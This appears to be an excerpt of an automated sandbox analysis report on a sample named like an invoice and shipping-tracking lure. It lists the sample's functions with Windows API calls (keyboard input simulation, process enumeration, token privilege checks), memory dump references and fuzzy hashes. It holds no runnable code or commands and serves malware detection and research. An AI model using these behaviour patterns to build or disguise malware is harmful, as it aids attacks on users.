CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00475783
GetLastError.KERNEL32(?,00000000), ref: 004757A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004757CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004757FA

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 92ca9afd8fe41bba47b12c9aa4ef774f677980ddcb92bd2aed9e314b4f82b91b
Instruction ID: f13808aea30b6ca16b11c775e8dbcf1b0d9e98dbc966274dcfaaa9eae21a4d25
Opcode Fuzzy Hash: 92ca9afd8fe41bba47b12c9aa4ef774f677980ddcb92bd2aed9e314b4f82b91b
Instruction Fuzzy Hash: 95412035600610DFCB11EF15C484A5EBBE1EF89318B15C499E84A6F3A1CB78FD40CB9A

Function 0043D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00426D71,00000000,00000000,004282D9,?,004282D9,?,00000001,00426D71,?,00000001,004282D9,004282D9), ref: 0043D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0043D9AB
__freea.LIBCMT ref: 0043D9B4

Part of subcall function 00433820: RtlAllocateHeap.NTDLL(00000000,?,004D1444,?,0041FDF5,?,?,0040A976,00000010,004D1440,004013FC,?,004013C6,?,00401129), ref: 00433852

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 9ca8838d67c80da80add7f0228582bfa6c55ad9ab9b7d5d82d1829862c59d564
Instruction ID: a53e0f3f1ef5dc868c73918eac7b199a89ae92d9bee37d62cdb11fb19589dfe8
Opcode Fuzzy Hash: 9ca8838d67c80da80add7f0228582bfa6c55ad9ab9b7d5d82d1829862c59d564
Instruction Fuzzy Hash: F8319FB2E0021AABDB259F65EC81EAF7BA5EF48310F05416AFC04D6251E739DD50CB94

Function 004952C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00495352
GetWindowLongW.USER32(?,000000F0), ref: 00495375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00495382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004953A8

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 511d5fb108f8a9e0f4715d13bedb196e9b3d0666c99cb93b483389f7228505c9
Instruction ID: 0ba8443947eaa0b957b328e53b3c9f677e901b32d7279b64616371192311d226
Opcode Fuzzy Hash: 511d5fb108f8a9e0f4715d13bedb196e9b3d0666c99cb93b483389f7228505c9
Instruction Fuzzy Hash: C931F430A55A08EFEF329E54CC55BEA3F61AB04390F684133FE00962E0C3B89D40974A

Function 0046AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 0046ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0046AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0046AC74
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 0046ACC6

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: da4e50ac3e50fd23d4db430a3597b4f20b680fab065b9ad7b9561f43606702b3
Instruction ID: 6b5f9ad4c50b4a72a5369b585876ced4ef989ed1503ca5ba201891c5ba0d6f35
Opcode Fuzzy Hash: da4e50ac3e50fd23d4db430a3597b4f20b680fab065b9ad7b9561f43606702b3
Instruction Fuzzy Hash: 5B312830A00B186FEF34CB658C087FB7BA5AB45310F04422BE485A22D0E37D9DA19B5B

Function 00497674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0049769A
GetWindowRect.USER32(?,?), ref: 00497710
PtInRect.USER32(?,?,00498B89), ref: 00497720
MessageBeep.USER32(00000000), ref: 0049778C

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: fe15a9e217fd7bcb431764799ed8c7dc07bd2885b048f42fb569177d8cc43f4a
Instruction ID: 3148850e934442bae9ab9e8f245fa14f7965a9a10bb23296050446444e877a0a
Opcode Fuzzy Hash: fe15a9e217fd7bcb431764799ed8c7dc07bd2885b048f42fb569177d8cc43f4a
Instruction Fuzzy Hash: D3414A74619214EFCF11CF98C894EA97BF5BB49314F1941FAE8149B361C738A941CB98

Function 004916DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004916EB

Part of subcall function 00463A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00463A57
Part of subcall function 00463A3D: GetCurrentThreadId.KERNEL32 ref: 00463A5E
Part of subcall function 00463A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004625B3), ref: 00463A65

GetCaretPos.USER32(?), ref: 004916FF
ClientToScreen.USER32(00000000,?), ref: 0049174C
GetForegroundWindow.USER32 ref: 00491752

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 11bec0e1d696e26015cd59d74202ba3a32b375971c8823a83a654b90efd21bfd
Instruction ID: 5366e923fa50b84878cb882f274bea31430ab8f9376de0b384123f59fd705def
Opcode Fuzzy Hash: 11bec0e1d696e26015cd59d74202ba3a32b375971c8823a83a654b90efd21bfd
Instruction Fuzzy Hash: 99311275D00149AFDB00EFA6C8C1CAEBBF9EF48308B5480BEE415E7251D6359E45CBA5

Function 0046D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0046D501
Process32FirstW.KERNEL32(00000000,?), ref: 0046D50F
Process32NextW.KERNEL32(00000000,?), ref: 0046D52F
CloseHandle.KERNEL32(00000000), ref: 0046D5DC

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: e68adc7a23f85812f23babb59a56f3755b6430aae0afbbbe77a2191eb9b5aaa7
Instruction ID: 1e1dc077c6455b88d8ec1c9876a89db7f789963d91dc58c9a99f723df26bd887
Opcode Fuzzy Hash: e68adc7a23f85812f23babb59a56f3755b6430aae0afbbbe77a2191eb9b5aaa7
Instruction Fuzzy Hash: 5331B571508300AFD300EF55C881AAFBBF8EF99348F14093EF582922A1EB759944CB97

Function 00498FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00419BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00419BB2

GetCursorPos.USER32(?), ref: 00499001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00457711,?,?,?,?,?), ref: 00499016
GetCursorPos.USER32(?), ref: 0049905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00457711,?,?,?), ref: 00499094

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 99250d01f5c890f46d6bf173303ea69ace29be20169c62719047dd2fe6ac5d5c
Instruction ID: cec915663ca2c8bb586f83bcaca78c357c621a7dc6f8ca8e30b19da9d674b97e
Opcode Fuzzy Hash: 99250d01f5c890f46d6bf173303ea69ace29be20169c62719047dd2fe6ac5d5c
Instruction Fuzzy Hash: BE217E35600018BFCF258F99C898EEA7FB9EB49360F04407AF91547261C33A9DA0DB64

Function 0046D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0049CB68), ref: 0046D2FB
GetLastError.KERNEL32 ref: 0046D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0046D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0049CB68), ref: 0046D376

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: a328578aa3fa1b59e8181e21dfa356f2da495c5afe57d429407714ed93bcf902
Instruction ID: f89fce8798b4be60d35f4643ff900d9e52ff374399ac8a38389119623698ce0a
Opcode Fuzzy Hash: a328578aa3fa1b59e8181e21dfa356f2da495c5afe57d429407714ed93bcf902
Instruction Fuzzy Hash: AE218070E042019FC710DF24C88186B77E4AE55368F504A2FF899D73E1E7349986CB9B

Function 00461571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00461014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0046102A
Part of subcall function 00461014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00461036
Part of subcall function 00461014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00461045
Part of subcall function 00461014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0046104C
Part of subcall function 00461014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00461062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004615BE
_memcmp.LIBVCRUNTIME ref: 004615E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00461617
HeapFree.KERNEL32(00000000), ref: 0046161E

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: c087934f54d4d3e469edce298c60a4ada1a724d013764d94ebe7646084812df3
Instruction ID: 50c26a26040ff8dbda8b13f57dc9cd37f0013f6c500579c25d0b33cfc995a18a
Opcode Fuzzy Hash: c087934f54d4d3e469edce298c60a4ada1a724d013764d94ebe7646084812df3
Instruction Fuzzy Hash: B921A131E40108EFDF00DFA4C945BEFB7B8EF54354F08445AE441A7261E734AA05CBA9

Function 00492782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0049280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00492824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00492832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00492840

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 39fd758a179dc2ddbf1195088ef25f8f6464044508af12ce5d3231460d8967c5
Instruction ID: 8f022e8f9d96002622f07904c5b1bdddc3a109718bdd758345d8f015df80652a
Opcode Fuzzy Hash: 39fd758a179dc2ddbf1195088ef25f8f6464044508af12ce5d3231460d8967c5
Instruction Fuzzy Hash: 6B21B231204511BFDB14DB24CD84FAA7B95AF45328F14827AF4169B6E2C7B9EC42C7D8

Function 004678F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00468D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0046790A,?,000000FF,?,00468754,00000000,?,0000001C,?,?), ref: 00468D8C
Part of subcall function 00468D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00468DB2
Part of subcall function 00468D7D: lstrcmpiW.KERNEL32(00000000,?,0046790A,?,000000FF,?,00468754,00000000,?,0000001C,?,?), ref: 00468DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00468754,00000000,?,0000001C,?,?,00000000), ref: 00467923
lstrcpyW.KERNEL32(00000000,?), ref: 00467949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00468754,00000000,?,0000001C,?,?,00000000), ref: 00467984

Strings

cdecl, xrefs: 0046797B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: cbd1a0a332b3244c1b25662a51b67cbdce4ae0660113ca5e4c182404778c95be
Instruction ID: 53f48bd44cf00279fb8665855dee4d1e5cccdd5f11d70974a3dc63400054e2da
Opcode Fuzzy Hash: cbd1a0a332b3244c1b25662a51b67cbdce4ae0660113ca5e4c182404778c95be
Instruction Fuzzy Hash: A511E47A200301ABDB159F39C845E7B77E5EF55354B50402FE802C7364FB359805C76A

Function 00495660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 004956BB
_wcslen.LIBCMT ref: 004956CD
_wcslen.LIBCMT ref: 004956D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00495816

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 82f448525df5596a1c6b9b3e414411d84ac42887d1fbcc34259e459b6fa5f1bd
Instruction ID: 8c45eedf7b365e18674649eb3225455f92985a3dc9cc18e629b01723ff380147
Opcode Fuzzy Hash: 82f448525df5596a1c6b9b3e414411d84ac42887d1fbcc34259e459b6fa5f1bd
Instruction Fuzzy Hash: 9411E471600614A6DF21DF61DC81AEF3B7CEF11764B60403BF915D6181E7788984CB68

Function 00461A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00461A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00461A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00461A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00461A8A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ecb82eb4b60301f1cc60a35434cffae2a92b3d6cde291a4d691fbdf649d211d8
Instruction ID: e331da36a062e35d37fa976fa192a343b57a296fe21c17f286506a53c3623515
Opcode Fuzzy Hash: ecb82eb4b60301f1cc60a35434cffae2a92b3d6cde291a4d691fbdf649d211d8
Instruction Fuzzy Hash: E4113C3AD01219FFEB10DBE5CD85FADBB78EB04750F2404A2E604B7290D6716E50DB98

Function 0046E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0046E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0046E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0046E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0046E24D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 39a9744079d8c27fbf30827386d6fa972f428657d55f2c39bc6967969ff0ae50
Instruction ID: ed460d70f0ccfbd7bd935a062b0e4119e6a50dfc0c374fbaf66538ad3b79bcf8
Opcode Fuzzy Hash: 39a9744079d8c27fbf30827386d6fa972f428657d55f2c39bc6967969ff0ae50
Instruction Fuzzy Hash: 98110876A04214BBD7019BA99C49A9F7FADAB45310F004277FC14D3291E2748D0487A9

Function 0042D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0042CFF9,00000000,00000004,00000000), ref: 0042D218
GetLastError.KERNEL32 ref: 0042D224
__dosmaperr.LIBCMT ref: 0042D22B
ResumeThread.KERNEL32(00000000), ref: 0042D249

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: d71c01c8223f455c691f7a2305e40d5149a69b7bc07c5e8b9ca6ecbc1125fc43
Instruction ID: db17610a689030999de63ba8fcbc3e52e12f0af083c40483d8da24f3cba52d70
Opcode Fuzzy Hash: d71c01c8223f455c691f7a2305e40d5149a69b7bc07c5e8b9ca6ecbc1125fc43
Instruction Fuzzy Hash: 7D012632E04124BBCB205BA6EC09BAF7A68DF81334F90026BF824921D0CF758801C6B9

Function 0040600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040604C
GetStockObject.GDI32(00000011), ref: 00406060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0040606A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

